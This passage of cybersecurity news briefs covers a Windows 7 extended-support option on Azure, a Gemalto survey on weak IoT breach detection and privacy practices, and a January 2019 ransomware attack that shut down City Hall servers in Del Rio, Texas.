Another option is to buy the Windows Virtual Desktop service, virtualizing Windows 7 on Azure VMs. This option comes with free ESUs but will also be available only for three years.
Despite the burgeoning IoT market, organizations made limited progress on IoT security in 2018, according to a new report from Gemalto. Though there is evidence of incremental improvements, security measures are being outpaced by the rapid growth of IoT, which is on track to hit 20 billion devices by 2023.
The survey queried 950 IT and business decision-makers with awareness of IoT in their organization in 2018. Of those, only 48% of companies said that they have the ability to detect whether their IoT devices have suffered a breach; however, 90% of respondents believe that security is a major concern for their customers.
According to the report, more than half (54%) of consumers fear that their privacy may be compromised by IoT devices, yet only 14% of the survey participants see protecting customer privacy by securing IoT devices as an ethical responsibility.
“Given the increase in the number of IoT-enabled devices, it’s extremely worrying to see that businesses still can’t detect if they have been breached,” said Jason Hart, CTO, data protection at Gemalto, in a press release. “With no consistent regulation guiding the industry, it’s no surprise the threats – and, in turn, vulnerability of businesses – are increasing. This will only continue unless governments step in now to help industry avoid losing control.”
More than a third (38%) of participants said they experience privacy challenges associated with collecting large amounts of IoT data. Still, more organizations have started using passwords to protect IoT devices. While 63% of organizations said they used passwords in 2017, the number of positive responses rose to 66% in 2018.
“Businesses are clearly feeling the pressure of protecting the growing amount of data they collect and store,” Hart said. “But while it’s positive they are attempting to address that by investing in more security, such as blockchain, they need direct guidance to ensure they’re not leaving themselves exposed. In order to get this, businesses need to be putting more pressure on the government to act, as it is them that will be hit if they suffer a breach.”
Another ransomware attack has made headlines with the city of Del Rio, Texas, announcing on January 10, 2019, that the servers at City Hall were disabled, according to a press release.
“The first step in addressing the issue was for the City’s M.I.S. (Management Information Services) Department to isolate the ransomware, which necessitated turning off the internet connection for all city departments and not allowing employees to log into the system. Due to this, transactions at City Hall are being done manually with paper.”
As many organizations hit by cyber-attacks have done, Del Rio turned to social media as an alternative channel of communication, using Facebook to inform citizens of the alternative payment options available to them.
After reporting the attack to the FBI, Del Rio was referred to the Secret Service. “The City is diligently working on finding the best solution to resolve this situation and restore the system. We ask the public to be patient with us as we may be slower in processing requests at this time,” the press release said.
At the time of writing, the website for the city of Del Rio was up and running, though there is no word on the full scope of the attack. Infosecurity has contacted the city, and this story will be updated with any response.
“The growing number of exploit kits and malware at their disposal is emboldening malicious actors to attack organizations with a rich trove of consumer data,” said Mike Bittner, digital security and operations manager at The Media Trust.
“Government organizations, in particular city governments, are prime targets; they not only process a lot of citizen and business data but are also less secure, as tighter budgets severely limit what IT updates they can carry out. Bad actors have no doubt put the 89,000 local governments across the country in their crosshairs. It is just a matter of time before many of these governments realize they’ve been hacked.”